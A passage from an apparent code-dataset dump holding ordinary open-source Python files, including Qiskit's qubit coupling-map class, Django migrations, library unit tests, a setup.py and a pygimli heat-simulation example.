parser.add_argument("--beta_1", type=float, default=0.9)
parser.add_argument("--beta_2", type=float, default=0.999)
# Environment variables given by the training image
parser.add_argument("--model-dir", type=str, default=os.environ["SM_MODEL_DIR"])
parser.add_argument("--train", type=str, default=os.environ["SM_CHANNEL_TRAINING"])
parser.add_argument("--test", type=str, default=os.environ["SM_CHANNEL_TESTING"])
parser.add_argument("--current-host", type=str, default=os.environ["SM_CURRENT_HOST"])
parser.add_argument("--hosts", type=list, default=json.loads(os.environ["SM_HOSTS"]))
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
train(args)
|
qiskit/transpiler/coupling.py | Roshan-Thomas/qiskit-terra | 1,456 | 12746257 | # This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""
Directed graph object for representing coupling between physical qubits.
The nodes of the graph correspond to physical qubits (represented as integers) and the
directed edges indicate which physical qubits are coupled and the permitted direction of
CNOT gates. The object has a distance function that can be used to map quantum circuits
onto a device with this coupling.
"""
import io
import warnings
import numpy as np
import retworkx as rx
from qiskit.transpiler.exceptions import CouplingError
from qiskit.exceptions import MissingOptionalLibraryError
class CouplingMap:
"""
Directed graph specifying fixed coupling.
Nodes correspond to physical qubits (integers) and directed edges correspond
to permitted CNOT gates
"""
__slots__ = ("description", "graph", "_dist_matrix", "_qubit_list", "_size", "_is_symmetric")
def __init__(self, couplinglist=None, description=None):
"""
Create coupling graph. By default, the generated coupling has no nodes.
Args:
couplinglist (list or None): An initial coupling graph, specified as
an adjacency list containing couplings, e.g. [[0,1], [0,2], [1,2]].
It is required that nodes are contiguously indexed starting at 0.
Missed nodes will be added as isolated nodes in the coupling map.
description (str): A string to describe the coupling map.
"""
self.description = description
# the coupling map graph
self.graph = rx.PyDiGraph()
# a dict of dicts from node pairs to distances
self._dist_matrix = None
# a sorted list of physical qubits (integers) in this coupling map
self._qubit_list = None
# number of qubits in the graph
self._size = None
self._is_symmetric = None
if couplinglist is not None:
self.graph.extend_from_edge_list([tuple(x) for x in couplinglist])
def size(self):
"""Return the number of physical qubits in this graph."""
if self._size is None:
self._size = len(self.graph)
return self._size
def get_edges(self):
"""
Gets the list of edges in the coupling graph.
Returns:
Tuple(int,int): Each edge is a pair of physical qubits.
"""
return self.graph.edge_list()
def add_physical_qubit(self, physical_qubit):
"""Add a physical qubit to the coupling graph as a node.
physical_qubit (int): An integer representing a physical qubit.
Raises:
CouplingError: if trying to add duplicate qubit
"""
if not isinstance(physical_qubit, int):
raise CouplingError("Physical qubits should be integers.")
if physical_qubit in self.physical_qubits:
raise CouplingError(
"The physical qubit %s is already in the coupling graph" % physical_qubit
)
self.graph.add_node(physical_qubit)
self._dist_matrix = None # invalidate
self._qubit_list = None # invalidate
self._size = None # invalidate
def add_edge(self, src, dst):
"""
Add directed edge to coupling graph.
src (int): source physical qubit
dst (int): destination physical qubit
"""
if src not in self.physical_qubits:
self.add_physical_qubit(src)
if dst not in self.physical_qubits:
self.add_physical_qubit(dst)
self.graph.add_edge(src, dst, None)
self._dist_matrix = None # invalidate
self._is_symmetric = None # invalidate
def subgraph(self, nodelist):
"""Return a CouplingMap object for a subgraph of self.
nodelist (list): list of integer node labels
"""
warnings.warn(
"The .subgraph() method is deprecated and will be removed in a "
"future release. Instead the .reduce() method should be used "
"instead which does the same thing but preserves nodelist order.",
DeprecationWarning,
stacklevel=2,
)
subcoupling = CouplingMap()
subcoupling.graph = self.graph.subgraph(nodelist)
return subcoupling
@property
def physical_qubits(self):
"""Returns a sorted list of physical_qubits"""
if self._qubit_list is None:
self._qubit_list = self.graph.node_indexes()
return self._qubit_list
def is_connected(self):
"""
Test if the graph is connected.
Return True if connected, False otherwise
"""
try:
return rx.is_weakly_connected(self.graph)
except rx.NullGraph:
return False
def neighbors(self, physical_qubit):
"""Return the nearest neighbors of a physical qubit.
Directionality matters, i.e. a neighbor must be reachable
by going one hop in the direction of an edge.
"""
return self.graph.neighbors(physical_qubit)
@property
def distance_matrix(self):
"""Return the distance matrix for the coupling map."""
self.compute_distance_matrix()
return self._dist_matrix
def compute_distance_matrix(self):
"""Compute the full distance matrix on pairs of nodes.
The distance map self._dist_matrix is computed from the graph using
all_pairs_shortest_path_length. This is normally handled internally
by the :attr:`~qiskit.transpiler.CouplingMap.distance_matrix`
attribute or the :meth:`~qiskit.transpiler.CouplingMap.distance` method
but can be called if you're accessing the distance matrix outside of
those or want to pre-generate it.
"""
if self._dist_matrix is None:
if not self.is_connected():
raise CouplingError("coupling graph not connected")
self._dist_matrix = rx.digraph_distance_matrix(self.graph, as_undirected=True)
def distance(self, physical_qubit1, physical_qubit2):
"""Returns the undirected distance between physical_qubit1 and physical_qubit2.
Args:
physical_qubit1 (int): A physical qubit
physical_qubit2 (int): Another physical qubit
Returns:
int: The undirected distance
Raises:
CouplingError: if the qubits do not exist in the CouplingMap
"""
if physical_qubit1 >= self.size():
raise CouplingError("%s not in coupling graph" % physical_qubit1)
if physical_qubit2 >= self.size():
raise CouplingError("%s not in coupling graph" % physical_qubit2)
self.compute_distance_matrix()
return int(self._dist_matrix[physical_qubit1, physical_qubit2])
def shortest_undirected_path(self, physical_qubit1, physical_qubit2):
"""Returns the shortest undirected path between physical_qubit1 and physical_qubit2.
Args:
physical_qubit1 (int): A physical qubit
physical_qubit2 (int): Another physical qubit
Returns:
List: The shortest undirected path
Raises:
CouplingError: When there is no path between physical_qubit1, physical_qubit2.
"""
paths = rx.digraph_dijkstra_shortest_paths(
self.graph, source=physical_qubit1, target=physical_qubit2, as_undirected=True
)
if not paths:
raise CouplingError(
f"Nodes {str(physical_qubit1)} and {str(physical_qubit2)} are not connected"
)
return paths[physical_qubit2]
@property
def is_symmetric(self):
"""
Test if the graph is symmetric.
Return True if symmetric, False otherwise
"""
if self._is_symmetric is None:
self._is_symmetric = self._check_symmetry()
return self._is_symmetric
def make_symmetric(self):
"""
Convert uni-directional edges into bi-directional.
"""
edges = self.get_edges()
for src, dest in edges:
if (dest, src) not in edges:
self.add_edge(dest, src)
self._dist_matrix = None # invalidate
self._is_symmetric = None # invalidate
def _check_symmetry(self):
"""
Calculates symmetry
Returns:
Bool: True if symmetric, False otherwise
"""
return self.graph.is_symmetric()
def reduce(self, mapping):
"""Returns a reduced coupling map that
corresponds to the subgraph of qubits
selected in the mapping.
Args:
mapping (list): A mapping of reduced qubits to device
qubits.
Returns:
CouplingMap: A reduced coupling_map for the selected qubits.
Raises:
CouplingError: Reduced coupling map must be connected.
"""
from scipy.sparse import coo_matrix, csgraph
reduced_qubits = len(mapping)
inv_map = [None] * (max(mapping) + 1)
for idx, val in enumerate(mapping):
inv_map[val] = idx
reduced_cmap = []
for edge in self.get_edges():
if edge[0] in mapping and edge[1] in mapping:
reduced_cmap.append([inv_map[edge[0]], inv_map[edge[1]]])
# Verify coupling_map is connected
rows = np.array([edge[0] for edge in reduced_cmap], dtype=int)
cols = np.array([edge[1] for edge in reduced_cmap], dtype=int)
data = np.ones_like(rows)
mat = coo_matrix((data, (rows, cols)), shape=(reduced_qubits, reduced_qubits)).tocsr()
if csgraph.connected_components(mat)[0] != 1:
raise CouplingError("coupling_map must be connected.")
return CouplingMap(reduced_cmap)
@classmethod
def from_full(cls, num_qubits, bidirectional=True) -> "CouplingMap":
"""Return a fully connected coupling map on n qubits."""
cmap = cls(description="full")
if bidirectional:
cmap.graph = rx.generators.directed_mesh_graph(num_qubits)
else:
edge_list = []
for i in range(num_qubits):
for j in range(i):
edge_list.append((j, i))
cmap.graph.extend_from_edge_list(edge_list)
return cmap
@classmethod
def from_line(cls, num_qubits, bidirectional=True) -> "CouplingMap":
"""Return a coupling map of n qubits connected in a line."""
cmap = cls(description="line")
cmap.graph = rx.generators.directed_path_graph(num_qubits, bidirectional=bidirectional)
return cmap
@classmethod
def from_ring(cls, num_qubits, bidirectional=True) -> "CouplingMap":
"""Return a coupling map of n qubits connected to each of their neighbors in a ring."""
cmap = cls(description="ring")
cmap.graph = rx.generators.directed_cycle_graph(num_qubits, bidirectional=bidirectional)
return cmap
@classmethod
def from_grid(cls, num_rows, num_columns, bidirectional=True) -> "CouplingMap":
"""Return a coupling map of qubits connected on a grid of num_rows x num_columns."""
cmap = cls(description="grid")
cmap.graph = rx.generators.directed_grid_graph(
num_rows, num_columns, bidirectional=bidirectional
)
return cmap
@classmethod
def from_heavy_hex(cls, distance, bidirectional=True) -> "CouplingMap":
"""Return a heavy hexagon graph coupling map.
A heavy hexagon graph is described in:
https://journals.aps.org/prx/abstract/10.1103/PhysRevX.10.011022
Args:
distance (int): The code distance for the generated heavy hex
graph. The value for distance can be any odd positive integer.
The distance relates to the number of qubits by:
:math:`n = \\frac{5d^2 - 2d - 1}{2}` where :math:`n` is the
number of qubits and :math:`d` is the ``distance`` parameter.
bidirectional (bool): Whether the edges in the output coupling
graph are bidirectional or not. By default this is set to
``True``
Returns:
CouplingMap: A heavy hex coupling graph
"""
cmap = cls(description="heavy-hex")
cmap.graph = rx.generators.directed_heavy_hex_graph(distance, bidirectional=bidirectional)
return cmap
@classmethod
def from_heavy_square(cls, distance, bidirectional=True) -> "CouplingMap":
"""Return a heavy square graph coupling map.
A heavy square graph is described in:
https://journals.aps.org/prx/abstract/10.1103/PhysRevX.10.011022
Args:
distance (int): The code distance for the generated heavy square
graph. The value for distance can be any odd positive integer.
The distance relates to the number of qubits by:
:math:`n = 3d^2 - 2d` where :math:`n` is the
number of qubits and :math:`d` is the ``distance`` parameter.
bidirectional (bool): Whether the edges in the output coupling
graph are bidirectional or not. By default this is set to
``True``
Returns:
CouplingMap: A heavy square coupling graph
"""
cmap = cls(description="heavy-square")
cmap.graph = rx.generators.directed_heavy_square_graph(
distance, bidirectional=bidirectional
)
return cmap
@classmethod
def from_hexagonal_lattice(cls, rows, cols, bidirectional=True) -> "CouplingMap":
"""Return a hexagonal lattice graph coupling map.
Args:
rows (int): The number of rows to generate the graph with.
cols (int): The number of columns to generate the graph with.
bidirectional (bool): Whether the edges in the output coupling
graph are bidirectional or not. By default this is set to
``True``
Returns:
CouplingMap: A hexagonal lattice coupling graph
"""
cmap = cls(description="hexagonal-lattice")
cmap.graph = rx.generators.directed_hexagonal_lattice_graph(
rows, cols, bidirectional=bidirectional
)
return cmap
def largest_connected_component(self):
"""Return a set of qubits in the largest connected component."""
return max(rx.weakly_connected_components(self.graph), key=len)
def __str__(self):
"""Return a string representation of the coupling graph."""
string = ""
if self.get_edges():
string += "["
string += ", ".join([f"[{src}, {dst}]" for (src, dst) in self.get_edges()])
string += "]"
return string
def draw(self):
"""Draws the coupling map.
This function needs `pydot <https://github.com/erocarrera/pydot>`_,
which in turn needs `Graphviz <https://www.graphviz.org/>`_ to be
installed. Additionally, `pillow <https://python-pillow.org/>`_ will
need to be installed.
Returns:
PIL.Image: Drawn coupling map.
Raises:
MissingOptionalLibraryError: when pydot or pillow are not installed.
"""
try:
import pydot
except ImportError as ex:
raise MissingOptionalLibraryError(
libname="pydot",
name="coupling map drawer",
pip_install="pip install pydot",
) from ex
try:
from PIL import Image
except ImportError as ex:
raise MissingOptionalLibraryError(
libname="pillow",
name="coupling map drawer",
pip_install="pip install pillow",
) from ex
dot_str = self.graph.to_dot()
dot = pydot.graph_from_dot_data(dot_str)[0]
png = dot.create_png(prog="neato")
return Image.open(io.BytesIO(png))
|
wrappers/python/tests/crypto/test_unpack_message.py | absltkaos/indy-sdk | 636 | 12746265 | <filename>wrappers/python/tests/crypto/test_unpack_message.py
import json
import pytest
from indy import crypto, error
@pytest.mark.asyncio
async def test_pack_message_and_unpack_message_authcrypt_works(wallet_handle, identity_my1, identity_steward1,
pack_message):
# setup keys
_, sender_vk = identity_my1
_, steward_vk = identity_steward1
recipient_verkeys = [steward_vk]
# run pack and unpack
packed_message = await crypto.pack_message(wallet_handle, pack_message, recipient_verkeys, sender_vk)
unpacked_message = await crypto.unpack_message(wallet_handle, packed_message)
# test function
unpacked_message_json = json.loads(unpacked_message.decode("utf-8"))
assert unpacked_message_json['message'] == pack_message
assert unpacked_message_json['recipient_verkey'] == steward_vk
assert unpacked_message_json['sender_verkey'] == sender_vk
@pytest.mark.asyncio
async def test_pack_message_and_unpack_message_anoncrypt_works(wallet_handle, identity_steward1, pack_message):
# setup keys
_, steward_vk = identity_steward1
recipient_verkeys = [steward_vk]
# run pack and unpack
packed_message = await crypto.pack_message(wallet_handle, pack_message, recipient_verkeys, None)
unpacked_message = await crypto.unpack_message(wallet_handle, packed_message)
# test function
unpacked_message_json = json.loads(unpacked_message.decode("utf-8"))
assert unpacked_message_json['message'] == pack_message
assert unpacked_message_json['recipient_verkey'] == steward_vk
assert 'sender_verkey' not in unpacked_message_json
@pytest.mark.asyncio
async def test_pack_message_and_unpack_message_missing_verkey(wallet_handle, identity_my1, verkey_my2, pack_message):
# setup keys
_, sender_vk = identity_my1
recipient_verkeys = [verkey_my2]
# run pack and unpack
packed_message = await crypto.pack_message(wallet_handle, pack_message, recipient_verkeys, sender_vk)
with pytest.raises(error.WalletItemNotFound):
await crypto.unpack_message(wallet_handle, packed_message)
|
orchestra/migrations/0037_add_fields_to_iteration.py | code-review-doctor/orchestra | 444 | 12746283 | <filename>orchestra/migrations/0037_add_fields_to_iteration.py<gh_stars>100-1000
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-14 21:18
from __future__ import unicode_literals
import django.utils.timezone
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [
('orchestra', '0036_remove_taskassignment_snapshots'),
]
operations = [
migrations.AddField(
model_name='iteration',
name='created_at',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AddField(
model_name='iteration',
name='is_deleted',
field=models.BooleanField(default=False),
),
]
|
securetea/lib/social_engineering/utils.py | pwned-17/SecureTea-Project | 257 | 12746287 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
u"""Utils module for SecureTea Social Engineering.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Author: <NAME> <<EMAIL>> , Aug 6 2020
Version: 2.1
Module: SecureTea
"""
import re
def check_valid_email(email):
"""
Check whether the email string is valid or not
Args:
email : email id
Raises:
None
Returns:
bool: True if valid, else False
"""
regex_std_mails = "^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w{2,3}$"
regex_custom_mails = "^[a-z0-9]+[\._]?[a-z0-9]+[@]\w+[.]\w+$"
return re.search(regex_std_mails,email) or re.search(regex_custom_mails,email) |
api/tacticalrmm/autotasks/migrations/0009_automatedtask_run_time_bit_weekdays.py | infinite8co/tacticalrmm | 903 | 12746304 | # Generated by Django 3.1.3 on 2020-11-29 09:12
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("autotasks", "0008_auto_20201030_1515"),
]
operations = [
migrations.AddField(
model_name="automatedtask",
name="run_time_bit_weekdays",
field=models.IntegerField(blank=True, null=True),
),
]
|
tools/third_party/websockets/src/websockets/typing.py | meyerweb/wpt | 14,668 | 12746307 | <filename>tools/third_party/websockets/src/websockets/typing.py
from typing import List, NewType, Optional, Tuple, Union
__all__ = ["Data", "Origin", "ExtensionHeader", "ExtensionParameter", "Subprotocol"]
Data = Union[str, bytes]
Data__doc__ = """
Types supported in a WebSocket message:
- :class:`str` for text messages
- :class:`bytes` for binary messages
"""
# Remove try / except when dropping support for Python < 3.7
try:
Data.__doc__ = Data__doc__ # type: ignore
except AttributeError: # pragma: no cover
pass
Origin = NewType("Origin", str)
Origin.__doc__ = """Value of a Origin header"""
ExtensionName = NewType("ExtensionName", str)
ExtensionName.__doc__ = """Name of a WebSocket extension"""
ExtensionParameter = Tuple[str, Optional[str]]
ExtensionParameter__doc__ = """Parameter of a WebSocket extension"""
try:
ExtensionParameter.__doc__ = ExtensionParameter__doc__ # type: ignore
except AttributeError: # pragma: no cover
pass
ExtensionHeader = Tuple[ExtensionName, List[ExtensionParameter]]
ExtensionHeader__doc__ = """Item parsed in a Sec-WebSocket-Extensions header"""
try:
ExtensionHeader.__doc__ = ExtensionHeader__doc__ # type: ignore
except AttributeError: # pragma: no cover
pass
Subprotocol = NewType("Subprotocol", str)
Subprotocol.__doc__ = """Items parsed in a Sec-WebSocket-Protocol header"""
|
tests/test_interface.py | Yuxiang1990/rising | 276 | 12746309 | <filename>tests/test_interface.py
import unittest
from rising import AbstractMixin
class Abstract(object):
def __init__(self, **kwargs):
super().__init__()
self.abstract = True
class AbstractForward(object):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.abstract = True
class PreMix(AbstractMixin, Abstract):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class PostMix(AbstractForward, AbstractMixin):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
class MyTestCase(unittest.TestCase):
def test_pre_mix(self):
obj = PreMix(a=True)
self.assertFalse(hasattr(obj, "a"))
self.assertTrue(obj.abstract)
def test_post_mix(self):
obj = PostMix(a=True)
self.assertTrue(obj.a)
self.assertTrue(obj.abstract)
if __name__ == "__main__":
unittest.main()
|
tests/rankingscreentest_delete.py | ADoesGit/osr2mp4-core | 103 | 12746317 | import os
import unittest
from PIL import Image
from utils import getdrawer, abspath
from helper import assert_image_similar
class TestRankingScreen(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.tests = []
cls.update = False
cls.tests.append(getdrawer("", "syunn", (123123123, -1)))
cls.tests.append(getdrawer("2", "syunn", (123123123, -1)))
def testframes(self):
for i in range(len(self.tests)):
drawer = self.tests[i][1]
expectf = self.tests[i][0] + "rankingbruh.png"
for x in range(int(0.5 * drawer.settings.fps)):
drawer.draw_rankingpanel()
if self.update:
drawer.pbuffer.save(expectf)
else:
expect = Image.open(expectf).convert("RGBA")
assert_image_similar(drawer.pbuffer, expect, 5)
expectf = self.tests[i][0] + "rankingbruh1.png"
for x in range(int(0.6 * drawer.settings.fps)):
drawer.draw_rankingpanel()
if self.update:
drawer.pbuffer.save(expectf)
else:
expect = Image.open(expectf).convert("RGBA")
assert_image_similar(drawer.pbuffer, expect, 1)
if __name__ == '__main__':
unittest.main()
|
setup.py | khaxis/plynx | 137 | 12746318 | #!/usr/bin/env python
import os
import plynx
from setuptools import setup, find_packages
def parse_requirements(filename):
""" load requirements from a pip requirements file """
lineiter = (line.strip() for line in open(filename))
return [line for line in lineiter if line and not line.startswith("#")]
DIR = os.path.dirname(os.path.abspath(__file__))
install_requires = parse_requirements(os.path.join(DIR, 'requirements.txt'))
# Extra dependencies for storage
dev_reqs = parse_requirements(os.path.join(DIR, 'requirements-dev.txt'))
gs = [
"google-cloud-storage>=1.13.0",
]
s3 = [
"boto3>=1.9.62",
]
ssh = [
"paramiko>=2.4.2",
]
all_reqs = dev_reqs + gs + s3 + ssh
setup(
name='plynx',
version=plynx.__version__,
description='ML platform',
long_description='Interactive, Scalable, Shareable and Reproducible ML experiments',
url='https://plynx.com',
author='<NAME>',
author_email='<EMAIL>',
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Information Technology',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Operating System :: POSIX',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Scientific/Engineering :: Visualization',
],
keywords='data science, machine learning, pipeline, workflow, experiments',
packages=find_packages(exclude=['scripts', 'docker']),
install_requires=install_requires,
extras_require={
'all': all_reqs,
'dev': dev_reqs,
'gs': gs,
's3': s3,
'ssh': ssh,
},
package_data={},
entry_points={
'console_scripts': [
'plynx=plynx.bin:main',
],
},
project_urls={
'Demo': 'https://plynx.com',
'Source': 'https://github.com/plynx-team/plynx',
},
# plynx.graph.base_nodes.collection uses reference to __file__
zip_safe=False,
)
|
doc/paper/cg17/example-1.py | baender/gimli | 224 | 12746340 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Minimal example of using pygimli to simulate the steady heat equation.
"""
import pygimli as pg
import pygimli.meshtools as mt
# Create geometry definition for the modelling domain
world = mt.createWorld(start=[-20, 0], end=[20, -16], layers=[-2, -8],
worldMarker=False)
# Create a heterogeneous block
block = mt.createRectangle(start=[-6, -3.5], end=[6, -6.0], marker=4,
boundaryMarker=10, area=0.1)
# Merge geometrical entities
geom = world + block
pg.show(geom, boundaryMarker=True, savefig='geometry.pdf')
# Create a mesh from the geometry definition
mesh = mt.createMesh(geom, quality=33, area=0.2, smooth=[1, 10])
pg.show(mesh, savefig='mesh.pdf')
# $\diverg(a\grad T)=0$ with $T(bottom)=1$, $T(top)=0$
T = pg.solver.solve(mesh,
a=[[1, 1.0], [2, 2.0], [3, 3.0], [4, 0.1]],
bc={'Dirichlet':{8:1.0, 4:0.0}},
verbose=True)
ax, _ = pg.show(mesh, data=T, label='Temperature $T$', cMap="hot_r",
nLevs=11, showBoundary=True, savefig='T_field.pdf')
|
PythonAPI/agents/navigation/test_global_route_planner.py | AbdulHoffmann/carla_carissma | 116 | 12746341 | <gh_stars>100-1000
import math
import unittest
import carla
from global_route_planner import GlobalRoutePlanner
from global_route_planner import NavEnum
from global_route_planner_dao import GlobalRoutePlannerDAO
class Test_GlobalRoutePlanner(unittest.TestCase):
"""
Test class for GlobalRoutePlanner class
"""
def setUp(self):
# == Utilities test instance without DAO == #
self.simple_grp = GlobalRoutePlanner(None)
# == Integration test instance == #
client = carla.Client('localhost', 2000)
world = client.get_world()
integ_dao = GlobalRoutePlannerDAO(world.get_map())
self.integ_grp = GlobalRoutePlanner(integ_dao)
self.integ_grp.setup()
pass
def tearDown(self):
self.simple_grp = None
self.dao_grp = None
self.integ_grp = None
pass
def test_plan_route(self):
"""
Test for GlobalROutePlanner.plan_route()
Run this test with carla server running Town03
"""
plan = self.integ_grp.plan_route((-60, -5), (-77.65, 72.72))
self.assertEqual(
plan, [NavEnum.START, NavEnum.LEFT, NavEnum.LEFT,
NavEnum.GO_STRAIGHT, NavEnum.LEFT, NavEnum.STOP])
def test_path_search(self):
"""
Test for GlobalRoutePlanner.path_search()
Run this test with carla server running Town03
"""
self.integ_grp.path_search((191.947, -5.602), (78.730, -50.091))
self.assertEqual(
self.integ_grp.path_search((196.947, -5.602), (78.730, -50.091)),
[256, 157, 158, 117, 118, 59, 55, 230])
def test_localise(self):
"""
Test for GlobalRoutePlanner.localise()
Run this test with carla server running Town03
"""
x, y = (200, -250)
segment = self.integ_grp.localise(x, y)
self.assertEqual(self.integ_grp._id_map[segment['entry']], 5)
self.assertEqual(self.integ_grp._id_map[segment['exit']], 225)
def test_unit_vector(self):
"""
Test for GlobalROutePlanner.unit_vector()
"""
vector = self.simple_grp.unit_vector((1, 1), (2, 2))
self.assertAlmostEquals(vector[0], 1 / math.sqrt(2))
self.assertAlmostEquals(vector[1], 1 / math.sqrt(2))
def test_dot(self):
"""
Test for GlobalROutePlanner.test_dot()
"""
self.assertAlmostEqual(self.simple_grp.dot((1, 0), (0, 1)), 0)
self.assertAlmostEqual(self.simple_grp.dot((1, 0), (1, 0)), 1)
def suite():
"""
Gathering all tests
"""
suite = unittest.TestSuite()
suite.addTest(Test_GlobalRoutePlanner('test_unit_vector'))
suite.addTest(Test_GlobalRoutePlanner('test_dot'))
suite.addTest(Test_GlobalRoutePlanner('test_localise'))
suite.addTest(Test_GlobalRoutePlanner('test_path_search'))
suite.addTest(Test_GlobalRoutePlanner('test_plan_route'))
return suite
if __name__ == '__main__':
"""
Running test suite
"""
mySuit = suite()
runner = unittest.TextTestRunner()
runner.run(mySuit)
|
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.